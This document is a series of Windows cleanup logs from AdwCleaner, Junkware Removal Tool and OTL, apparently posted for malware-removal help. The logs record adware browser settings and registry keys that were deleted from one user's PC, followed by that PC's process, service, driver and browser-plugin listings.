Line Deleted : user_pref("smartbar.conduitSearchAddressUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3295465&SearchSource=2&CUI=UN42594005009011554&UM=2&q=");
Line Deleted : user_pref("smartbar.originalHomepage", "hxxp://www.zassyen.net/");
Line Deleted : user_pref("smartbar.originalSearchAddressUrl", "hxxp://searchou.com/?q={searchTerms}&id=98edcf170000000000000050b60df2d6");
Line Deleted : user_pref("smartbar.originalSearchEngine", "Yahoo");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
Line Deleted : user_pref("sweetim.toolbar.previous.keyword.URL", "");
Line Deleted : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.enable", "");

-\\ Google Chrome v

[ File : C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [24463 octets] - [03/01/2014 15:50:10]
AdwCleaner[S0].txt - [23946 octets] - [03/01/2014 15:59:16]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [24007 octets] ##########
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.0.9 (01.01.2014:1)
OS: Windows 7 Home Premium x64
Ran by Wesley on Fri 01/03/2014 at 16:07:27.37
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services

Successfully stopped: [Service] update jump flip
Successfully deleted: [Service] update jump flip



~~~ Registry Values

Successfully repaired: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AboutURLs\\Tabs



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\yt.ytnavassistplugin
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\yt.ytnavassistplugin.1
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\mconduitinstaller_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\mconduitinstaller_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\dealcabby-20120921_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\dealcabby-20120921_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\dealcabby_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\dealcabby_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\dropdowndeals_132013-17B4_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\dropdowndeals_132013-17B4_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\mconduitinstaller_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\mconduitinstaller_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\dealcabby-20120921_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\dealcabby-20120921_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\dealcabby_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\dealcabby_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\dropdowndeals_132013-17B4_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\dropdowndeals_132013-17B4_RASMANCS
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{27BF7A62-CF9F-4A1A-9BB5-61A8DABE910E}
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{63140ECF-C629-BE59-8F0E-90B4FF340C03}
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{AC533334-23E6-4E5F-B1DA-9240ED676A3E}



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Users\Wesley\AppData\Roaming\getrighttogo"
Successfully deleted: [Folder] "C:\Users\Wesley\appdata\local\dealcabby"
Successfully deleted: [Folder] "C:\ai_recyclebin"
Successfully deleted: [Folder] "C:\Windows\syswow64\ai_recyclebin"
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{05C16CC4-AFAB-4847-BBBF-C4DA1B40900D}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{21CBF92E-4287-48EB-9B36-290CF9F9A277}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{23CE5200-C1A9-48CB-A543-91E428506870}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{2ACB9458-1CFA-436A-8C10-7B2631D00562}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{3B85A670-5B17-405F-A588-F866E1F47C66}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{4AB6C148-0929-4797-84DB-1423F4398616}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{5288F121-67C7-4D9E-95D5-BFFAC99EF213}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{5B59AC67-B862-4648-BD37-0378607C3AFA}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{66F1DA9F-9468-4194-9AEB-79E802DF5EF0}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{6B409C12-2790-476C-A4AA-BDE70BA93FD3}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{6CAC53A6-5063-4526-815D-11F8AC2E48A6}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{72EC7571-B47B-448A-BDCE-747508B225E2}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{79D6423F-2459-4AB2-B3D9-141BF55C49F2}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{7E7130CF-AD82-4666-90C9-EB472D0153E4}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{8C09987A-047A-44E6-92FD-9450BF44A98F}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{947851B8-DAE2-4600-8BC5-C10E03B98063}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{9C953580-B8C4-44C2-A2EB-9D2E656BE5C3}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{B7869181-8243-437F-AE2F-67CA5DEDC437}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{BB837E4B-9D1B-4DEE-AAC8-7278777C5604}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{C0664E3E-3BDF-4606-A9C9-145614432CA4}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{C7F28E15-F7E1-4E31-8D2F-564EB9C9CA9D}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{CE054628-B08D-4DDE-8DC4-B1C99678D2E4}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{D545371D-9A9F-4E17-88CD-CC968FFBDA58}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{D56743DB-C171-4A89-BE0F-32727560E9F5}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{D988442A-6D8B-413A-B389-8C66380A9E22}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{EE024842-D860-4A5A-832D-DDF4A301BBA0}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{EFD3475D-2F39-4C1A-BF32-94AE36767624}
Successfully deleted: [Empty Folder] C:\Users\Wesley\appdata\local\{F4CFC7DF-B026-4984-9D1E-802044B3888E}



~~~ FireFox

Successfully deleted: [File] C:\user.js
Failed to delete: [File] "C:\Program Files (x86)\Mozilla Firefox\searchplugins\bing.xml.old"
Successfully deleted: [File] "C:\Program Files (x86)\Mozilla Firefox\searchplugins\bing.xml.old"
Successfully deleted: [File] C:\Users\Wesley\AppData\Roaming\mozilla\firefox\profiles\09qn4qhk.default\searchplugins\privitize.xml
Successfully deleted the following from C:\Users\Wesley\AppData\Roaming\mozilla\firefox\profiles\09qn4qhk.default\prefs.js

user_pref("extensions.privitize.admin", false);
user_pref("extensions.privitize.aflt", "orgnl");
user_pref("extensions.privitize.appId", "{301966DF-A84B-4255-AAB9-574B5CE237E4}");
user_pref("extensions.privitize.autoRvrt", "false");
user_pref("extensions.privitize.dfltLng", "");
user_pref("extensions.privitize.dfltSrch", true);
user_pref("extensions.privitize.dnsErr", true);
user_pref("extensions.privitize.excTlbr", true);
user_pref("extensions.privitize.ffxUnstlRst", false);
user_pref("extensions.privitize.hmpg", true);
user_pref("extensions.privitize.hmpgUrl", "hxxp://searchou.com/?id=98edcf170000000000000050b60df2d6");
user_pref("extensions.privitize.hpOld0", "hxxp://www.zassyen.net/");
user_pref("extensions.privitize.id", "98edcf170000000000000050b60df2d6");
user_pref("extensions.privitize.instlDay", "15798");
user_pref("extensions.privitize.instlRef", "");
user_pref("extensions.privitize.kw_url", "hxxp://searchou.com/?q={searchTerms}&id=98edcf170000000000000050b60df2d6");
user_pref("extensions.privitize.newTab", true);
user_pref("extensions.privitize.newTabUrl", "hxxp://searchou.com/?id=98edcf170000000000000050b60df2d6");
user_pref("extensions.privitize.prdct", "privitize");
user_pref("extensions.privitize.prtnrId", "privitize");
user_pref("extensions.privitize.rvrt", "false");
user_pref("extensions.privitize.smplGrp", "none");
user_pref("extensions.privitize.tlbrId", "base");
user_pref("extensions.privitize.tlbrSrchUrl", "hxxp://searchou.com/?id=98edcf170000000000000050b60df2d6&q=");
user_pref("extensions.privitize.vrsn", "1.8.16.22");
user_pref("extensions.privitize.vrsnTs", "1.8.16.229:03:03");
user_pref("extensions.privitize.vrsni", "1.8.16.22");
Emptied folder: C:\Users\Wesley\AppData\Roaming\mozilla\firefox\profiles\09qn4qhk.default\minidumps [403 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 01/03/2014 at 16:14:50.60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

OTL logfile created on: 1/3/2014 4:18:20 PM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Wesley\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.98 Gb Total Physical Memory | 2.63 Gb Available Physical Memory | 66.03% Memory free
7.96 Gb Paging File | 6.45 Gb Available in Paging File | 80.98% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 240.35 Gb Free Space | 25.80% Space Free | Partition Type: NTFS
Drive D: | 6.85 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: UDF
Drive H: | 1863.01 Gb Total Space | 21.24 Gb Free Space | 1.14% Space Free | Partition Type: NTFS
Drive M: | 1863.01 Gb Total Space | 29.76 Gb Free Space | 1.60% Space Free | Partition Type: NTFS
 
Computer Name: VERONICA | User Name: Wesley | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Users\Wesley\Desktop\OTL(1).exe (OldTimer Tools)
PRC - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe (NCSOFT Corporation)
PRC - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
PRC - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
PRC - C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
PRC - C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
PRC - C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe (VMware, Inc.)
PRC - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
PRC - C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
PRC - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
PRC - C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
 
 
========== Modules (No Company Name) ==========
 
MOD - c:\ProgramData\WebPlat\WebPlat.dll ()
MOD - C:\Program Files (x86)\Mozilla Firefox\mozjs.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ()
MOD - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\Nv3DVStreaming.dll ()
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - (FLEXnet Licensing Service 64) -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe (Flexera Software, Inc.)
SRV:64bit: - (mi-raysat_3dsmax2012_64) -- C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)
SRV:64bit: - (976137e5) -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
SRV:64bit: - (msvsmon90) -- C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe (Microsoft Corporation)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (DAUpdaterSvc) -- C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe (BioWare)
SRV - (MozillaMaintenance) -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (ArcService) -- C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe (Perfect World Entertainment Inc)
SRV - (MBAMService) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe (Malwarebytes Corporation)
SRV - (MBAMScheduler) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation)
SRV - (SkypeUpdate) -- C:\Program Files (x86)\Skype\Updater\Updater.exe (Skype Technologies)
SRV - (AdobeARMservice) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (npggsvc) -- C:\Windows\SysWOW64\GameMon.des (INCA Internet Co., Ltd.)
SRV - (VMnetDHCP) -- C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
SRV - (VMware NAT Service) -- C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
SRV - (VMAuthdService) -- C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe (VMware, Inc.)
SRV - (sftvsa) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
SRV - (sftlist) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe (Microsoft Corporation)
SRV - (VMUSBArbService) -- C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe (VMware, Inc.)
SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)
SRV - (FLEXnet Licensing Service) -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Macrovision Europe Ltd.)
SRV - (Stereo Service) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
SRV - (ES lite Service) -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (YahooAUService) -- C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe (Yahoo! Inc.)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - (MBAMProtector) -- C:\Windows\SysNative\drivers\mbam.sys (Malwarebytes Corporation)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)
DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)
DRV:64bit: - (vmx86) -- C:\Windows\SysNative\drivers\vmx86.sys (VMware, Inc.)
DRV:64bit: - (VMparport) -- C:\Windows\SysNative\drivers\VMparport.sys (VMware, Inc.)
DRV:64bit: - (vmkbd) -- C:\Windows\SysNative\drivers\VMkbd.sys (VMware, Inc.)
DRV:64bit: - (VMnetuserif) -- C:\Windows\SysNative\drivers\vmnetuserif.sys (VMware, Inc.)
DRV:64bit: - (VMnetBridge) -- C:\Windows\SysNative\drivers\vmnetbridge.sys (VMware, Inc.)
DRV:64bit: - (VMnetAdapter) -- C:\Windows\SysNative\drivers\vmnetadapter.sys (VMware, Inc.)
DRV:64bit: - (Sftvol) -- C:\Windows\SysNative\drivers\Sftvollh.sys (Microsoft Corporation)
DRV:64bit: - (Sftplay) -- C:\Windows\SysNative\drivers\Sftplaylh.sys (Microsoft Corporation)
DRV:64bit: - (Sftredir) -- C:\Windows\SysNative\drivers\Sftredirlh.sys (Microsoft Corporation)
DRV:64bit: - (Sftfs) -- C:\Windows\SysNative\drivers\Sftfslh.sys (Microsoft Corporation)
DRV:64bit: - (hcmon) -- C:\Windows\SysNative\drivers\hcmon.sys (VMware, Inc.)
DRV:64bit: - (vmci) -- C:\Windows\SysNative\drivers\vmci.sys (VMware, Inc.)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (NVHDA) -- C:\Windows\SysNative\drivers\nvhda64v.sys (NVIDIA Corporation)
DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (ATI Technologies Inc.)
DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (npf) -- C:\Windows\SysNative\drivers\npf.sys (CACE Technologies, Inc.)
DRV:64bit: - (RTHDMIAzAudService) -- C:\Windows\SysNative\drivers\RtHDMIVX.sys (Realtek Semiconductor Corp.)
DRV:64bit: - (nusb3xhc) -- C:\Windows\SysNative\drivers\nusb3xhc.sys (NEC Electronics Corporation)
DRV:64bit: - (nusb3hub) -- C:\Windows\SysNative\drivers\nusb3hub.sys (NEC Electronics Corporation)
DRV:64bit: - (xusb21) -- C:\Windows\SysNative\drivers\xusb21.sys (Microsoft Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek                                            )
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (RTL8023x64) -- C:\Windows\SysNative\drivers\Rtnic64.sys (Realtek Semiconductor Corporation                           )
DRV:64bit: - (NVENETFD) -- C:\Windows\SysNative\drivers\nvm62x64.sys (NVIDIA Corporation)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (AX88772) -- C:\Windows\SysNative\drivers\ax88772.sys (ASIX Electronics Corp.)
DRV - (gdrv) -- C:\Windows\gdrv.sys (Windows ® Server 2003 DDK provider)
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
DRV - (NPPTNT2) -- C:\Windows\SysWOW64\npptNT2.sys (INCA Internet Co., Ltd.)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
IE:64bit: - HKLM\..\SearchScopes\{050F6D2A-CD2C-4CCF-A95E-9A59CEE646C0}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{52A54A6E-3E27-4A22-A928-6755ADA9CFFC}: "URL" = http://www.bing.com/...rc=IE-SearchBox
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKCU\..\URLSearchHook: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
IE - HKCU\..\SearchScopes,DefaultScope =
IE - HKCU\..\SearchScopes\{16C1B23E-3CE1-4f7f-A708-A8F88D636FD7}: "URL" = http://search.yahoo....cevm&type=STDVM
IE - HKCU\..\SearchScopes\{182BD4F4-21ED-4e6c-B65D-F3B9DB6B36AE}: "URL" = http://www.google.co...2788:4067623346
IE - HKCU\..\SearchScopes\{39567D58-C4D9-4285-9C5C-208E15077106}: "URL" = http://www.bing.com/...=SPLBR2&pc=SPLH
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Yahoo"
FF - prefs.js..browser.search.defaultenginename,S: S", ""
FF - prefs.js..browser.search.order.1,S: S", ""
FF - prefs.js..browser.search.param.yahoo-fr: "moz2-ytff-sunm"
FF - prefs.js..browser.search.param.yahoo-fr-cjkt: "moz2-ytff-sunm"
FF - prefs.js..browser.search.selectedEngine,S: S", ""
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.enabledAddons: %7B73a6fe31-595d-460b-a920-fcc0f8843232%7D:2.6.8.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:26.0
FF - prefs.js..extensions.enabledItems: {73a6fe31-595d-460b-a920-fcc0f8843232}:2.1.0.3
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}:6.0.23
FF - prefs.js..network.proxy.type: 0
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.6.2: C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.6.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@perfectworld.com/npArcPlayNowPlugin: C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\npArcPluginFF.dll (Perfect World Entertainment Inc)
FF - HKLM\Software\MozillaPlugins\@playstation.com/PsndlCheck,version=1.00: C:\Program Files (x86)\Sony\PLAYSTATION Network Downloader\nppsndl.dll (Sony Computer Entertainment Inc.)
FF - HKLM\Software\MozillaPlugins\@SonyCreativeSoftware.com/Media Go,version=1.0: C:\Program Files (x86)\Sony\Media Go\npmediago.dll (Sony Network Entertainment International LLC)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKCU\Software\MozillaPlugins\vitzo.com/VDownloader: C:\Program Files\VDownloader\Addons\npVDownloader.dll (Vitzo)
 
